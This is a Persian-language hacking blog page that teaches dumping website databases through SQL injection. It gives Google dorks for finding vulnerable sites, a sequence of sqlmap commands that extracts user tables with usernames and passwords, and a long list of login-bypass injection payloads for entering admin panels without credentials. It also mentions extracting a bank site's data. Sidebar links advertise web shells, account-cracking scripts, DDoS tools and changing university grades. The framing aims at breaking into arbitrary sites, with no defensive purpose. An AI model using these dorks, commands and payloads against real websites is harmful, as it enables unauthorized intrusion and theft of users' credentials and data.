توضیحات اصطلاحاتی که هکر ها در وب هکینگ از آنها استفاده میکنند...
آموزش دامپ دیتابیس سایت ها با باگ Sql Injection با کمک ابذار Sqlmap
در قدم اول یک سایت که دارایی باگ sql داره را پیدا کنید(میتوانید از دورک های زیر استفاده کنید)
inurl:news.php?id=
inurl:pages.php?id=
inurl:post.php?id=
inurl:events.php?id=
inurl:details.php?id=
inurl:blog.php?id=
inurl:show.php?id=
تارگتی که بنده در این آموزش استفاده میکنم
http://testphp.vulnweb.com/listproducts.php?cat=1'
(سپس یک ترمینال را بازکنید(با دستور زیر دیتابیس سایت را بیرون بکشید
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 —dbs
سپس دیتابیس های سایت رو به ما در اخر نشون میده بعدش با دستور زیر جدول های دیتادیس مورد نظر خودمونو بدست میاریم
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D نام دیتابیس —tables
مثلا ما فرض رو به این میگیریم یه تیبل به ما نشون میده و اسمش هم یوزر هستش با دستور زیر ستون های دیتابیس رو بدست میاریم
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D dbname -T users —columns
فرض میکنیم که سه تا ستون زیر رو نشون میده
username
password
در نهایت با دستور زیر دیتای ستون هارو بدست میاریم
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D dbname -T users -C username password email —dump
دیتابیس شما با موفقیت دامپ شد
ومن الله توفیق
منبع: Hijack.blog.ir
در تصویر زیر کارکترهای که برای شناسایی باگ ها استفاده می شود همراه با توضیح قرار گرفته است
منبع: Hijack.blog.ir
مجموعه دستوراتی که برای تزریق به صفحات لاگین در باگ sql استفاده میشود شامل موارد زیر میشود.
or'1'='1'or'1'='1'
'or'1'='1'or'1'='1
' or ' '='
' or ''='
admin'or''='
admin" or "a"="
admin" or 1=1 --
admin' or 1=1 --
admin' or 'a'='a
admin') or ('a'='a
admin") or ("a"="a
a=1)--
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
که نفوذگر با قرار دادن این دستورات در صفحات لاگین یک وب سایت بدون داشتن یوزر و پسورد اقدام به Bypass به پنل مدیریتی یا کاربری میکند.
منبع: Hijack.blog.ir
به تصویر بالا و نوار آدرس دقت کنید نفوذگر با ارسال دستورات از همین قسمت اطلاعات وب سایت بانک را استخراج میکند.
آموزش bypass پنل ادمین با افزونه No Redirect (روش جدید)
جهت دریافت آموزش کلیک کنید
حجم: 8.78 مگابایت
پسورد: hijack.blog.ir
جهان دست "هکر" هاست
طبقه بندی موضوعی
-
priv8
(۶) -
Other
(۴۷) -
Linux
(۹) -
Script
(۷) -
Link.Onion
(۴) -
PDF Sec-HK
(۱۲) -
Tool Hacking
(۲۴) -
News Security
(۴۰) -
Famous hackers
(۳) -
Penetration test web
(۱۰)
کلمات کلیدی
خبر امنیتی
اسکریپت
آموزش کالی لینوکس
اخبار بد افزار
ابزار هک
لینک دارک وب
فیشینگ
آیا میدانستید IT
اینفوگرافیک IT
اخبار IT
وضعیت حملات سایبری
امنیت سایبری
شل ALFA
دانلود شل الفا
دانلود ALFA shell
خبر سایبری
خبر آسیب پذیری
خبر it
بات نت
ابزار هک اندروید
بد افزار
آموزش python
ابزار ddos
هک سایت
آموزش دفیس سایت
کتاب هک و امنیت
تست نفوذ
هک از طریق سوکت وب
ابزار کنترل و مدیریت سیستم قربانی
ابزار نفوذ به سیستم
بایگانی
آخرین مطلب
- آلودگی بیش از 500000 قربانی به باج افزار VpnFilter
- حملات روز صفر | Zero day
- خبر / هک سایت آذری جهرمی
- هک شدن کارکنان FBI
- برای محفاظت از حریم خصوصی چکار کنیم؟
- هکر اؤن تور واکر
- اکسپلویت آسیب پذیر در پیام رسان داخلی iGap
- مرورگر اینترنت اکسپلورر، دام جدید هکرها
- فرق بین وب سرور و سیستم سرور
- باج افزار PUBG
پربیننده ترین مطالب
- لینک وبسایت های دارک وب
- Dorks SQl Injection 2017
- اسکریپت کرک اکانت اینستاگرام
- دانلود شل الفا | ALFA shell
- آموزش راه اندازی اینترنت اوترنت (ماهواره ای)
- آموزش نفوذ به سیستم دانشگاهی و تغییر نمرات
- آموزش دامپ دیتابیس سایت ها
- دوره آموزشی کاربرد پایتون در هک
- ابزار SSH-Cracker
- پیدا کردن ip سایت مجهز به سیستم Cloudflare
محبوب ترین مطالب